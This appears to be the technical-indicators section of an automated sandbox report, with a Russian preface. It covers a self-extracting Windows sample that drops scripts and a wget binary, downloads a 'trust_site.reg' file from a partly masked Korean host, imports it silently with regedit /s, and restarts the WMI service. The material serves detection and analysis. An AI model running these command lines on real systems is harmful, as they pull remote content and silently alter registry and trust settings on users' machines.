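Техническая информация
Примечание: заголовки подразделов в этой копии отчёта не сохранились. Судя по содержимому, записи ниже идут в таком порядке: параметры реестра службы winmgmt (ServiceDll, ImagePath, Start); командные строки процессов; пути файлов в каталоге %TEMP%\RarSFX0 (по самому списку нельзя определить, какие из них созданы, а какие удалены; trust_site.reg указан дважды); сетевая активность (узел и порт 80, URL, запрос DNS); классы окон (вероятно, те, которые ищет образец). Показанные значения параметров winmgmt, по-видимому, совпадают со стандартными для службы WMI, поэтому сами по себе они слабый индикатор. Символы «#» в имени узла и в URL, по-видимому, являются маскировкой из исходного отчёта: эти значения неполные и не подходят для точного сопоставления.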
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt\Parameters] 'ServiceDll' = '<SYSTEM32>\wbem\WMIsvc.dll'
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt] 'ImagePath' = '<SYSTEM32>\svchost.exe -k netsvcs'
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt] 'Start' = '00000002'
- '<SYSTEM32>\wscript.exe' "%TEMP%\RarSFX0\IIMS_INSTALLER_START.vbs"
- '%WINDIR%\regedit.exe' /s "trust_site.reg"
- '<SYSTEM32>\wbem\winmgmt.exe' /kill
- '<SYSTEM32>\wbem\winmgmt.exe' /regserver
- '<SYSTEM32>\wbem\winmgmt.exe' /unregserver
- '%TEMP%\RarSFX0\wget.exe' -c -O trust_site.reg http://www.in##r.co.kr/appGuide/appDownloads.php?ap################
- '<SYSTEM32>\wbem\winmgmt.exe' /clearadap
- '<SYSTEM32>\cmd.exe' /c %TEMP%\RarSFX0\xp_load_mgmt.cmd
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\trust_site.cmd" "%TEMP%\RarSFX0""
- '<SYSTEM32>\wbem\wmiadap.exe' /C
- %TEMP%\RarSFX0\UPHClean-Setup__Access is denied Userenv Error msg.msi
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\IIMS_INSTALLER_START.vbs
- %TEMP%\RarSFX0\trust_site.reg
- %TEMP%\RarSFX0\secure_desktop.vbs
- %TEMP%\RarSFX0\trust_site.cmd
- %TEMP%\RarSFX0\popup_site.cmd
- %TEMP%\RarSFX0\UPHClean_Setup.cmd
- %TEMP%\RarSFX0\iims_reinstaller.exe
- %TEMP%\RarSFX0\xp_load_mgmt.cmd
- %TEMP%\RarSFX0\trust_site.reg
- 'www.in##r.co.kr':80
- http://www.in##r.co.kr/appGuide/appDownloads.php?ap###############
- DNS ASK www.in##r.co.kr
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''